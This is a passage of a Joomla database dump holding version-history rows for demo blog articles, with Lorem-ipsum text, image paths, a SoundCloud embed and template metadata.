Doe\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":4,\"ordering\":\"0\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"28\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(41,76,1,'','2016-02-27 09:33:51',692,4154,'cb7a2f216c0f9c90f142c1a2803375796ea44cf5','{\"id\":76,\"asset_id\":\"200\",\"title\":\"Who Actually Clicks on Banner Ads?\",\"alias\":\"who-actually-clicks-on-banner-ads\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus.<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-27 09:33:51\",\"modified_by\":\"692\",\"checked_out\":\"692\",\"checked_out_time\":\"2016-02-27 09:33:28\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/images-03.jpg\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"Responive Joomla Templates\\\",\\\"link_url\\\":\\\"http:\\\\\\/\\\\\\/www.joomshaper.com\\\\\\/joomla-templates\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":5,\"ordering\":\"1\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"38\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(42,75,1,'','2016-02-27 09:34:13',692,4629,'6e872076104f2c096fe8d7f3a371348e11d4c7dc','{\"id\":75,\"asset_id\":\"199\",\"title\":\"5 Effective Email Unsubscribe Pages.\",\"alias\":\"5-effective-email-unsubscribe-pages\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-27 09:34:13\",\"modified_by\":\"692\",\"checked_out\":\"692\",\"checked_out_time\":\"2016-02-27 09:33:54\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/images-02.jpg\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"<iframe width=\\\\\\\"100%\\\\\\\" height=\\\\\\\"450\\\\\\\" scrolling=\\\\\\\"no\\\\\\\" frameborder=\\\\\\\"no\\\\\\\" src=\\\\\\\"https:\\\\\\/\\\\\\/w.soundcloud.com\\\\\\/player\\\\\\/?url=https%3A\\\\\\/\\\\\\/api.soundcloud.com\\\\\\/tracks\\\\\\/28830162&auto_play=false&hide_related=false&show_comments=true&show_user=true&show_reposts=false&visual=true\\\\\\\"><\\\\\\/iframe>\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":7,\"ordering\":\"2\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"22\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(43,74,1,'','2016-02-27 09:34:32',692,3654,'89abcd7b02d4e599daf38e2cf70b4304fa7538d0','{\"id\":74,\"asset_id\":\"198\",\"title\":\"The salesman is dead. Long live the salesman.\",\"alias\":\"the-salesman-is-dead-long-live-the-salesman\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-27 09:34:32\",\"modified_by\":\"692\",\"checked_out\":\"692\",\"checked_out_time\":\"2016-02-27 09:34:16\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/images-02.jpg\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"{\\\\\\\"gallery_images\\\\\\\":[\\\\\\\"images\\\\\\/blog\\\\\\/blog06.jpg\\\\\\\",\\\\\\\"images\\\\\\/blog\\\\\\/blog05.jpg\\\\\\\",\\\\\\\"images\\\\\\/blog\\\\\\/blog04.jpg\\\\\\\"]}\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":5,\"ordering\":\"3\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"38\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(44,73,1,'','2016-02-27 09:35:09',692,3019,'607c0ef02963489c8897a021aace49bf5e4868c7','{\"id\":73,\"asset_id\":\"197\",\"title\":\"Portable sales devices making a difference.\",\"alias\":\"portable-sales-devices-making-a-difference\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-27 09:35:09\",\"modified_by\":\"692\",\"checked_out\":\"692\",\"checked_out_time\":\"2016-02-27 09:34:35\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/images-03.jpg\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":5,\"ordering\":\"4\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"96\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(45,76,1,'','2016-02-28 08:17:24',692,4154,'e61a1ac82b39cd0b12b463a8fd061252d8bf1e81','{\"id\":76,\"asset_id\":\"200\",\"title\":\"Who Actually Clicks on Banner Ads?\",\"alias\":\"who-actually-clicks-on-banner-ads\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus.<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-28 08:17:24\",\"modified_by\":\"692\",\"checked_out\":\"692\",\"checked_out_time\":\"2016-02-28 08:17:11\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/images-04.jpg\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"Responive Joomla Templates\\\",\\\"link_url\\\":\\\"http:\\\\\\/\\\\\\/www.joomshaper.com\\\\\\/joomla-templates\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":6,\"ordering\":\"1\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"38\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(46,73,1,'','2016-02-28 08:17:52',692,3019,'e62ade55ada6fe03c6f029f187bb0c1a3b1a3304','{\"id\":73,\"asset_id\":\"197\",\"title\":\"Portable sales devices making a difference.\",\"alias\":\"portable-sales-devices-making-a-difference\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-28 08:17:52\",\"modified_by\":\"692\",\"checked_out\":\"692\",\"checked_out_time\":\"2016-02-28 08:17:32\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/images-06.jpg\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\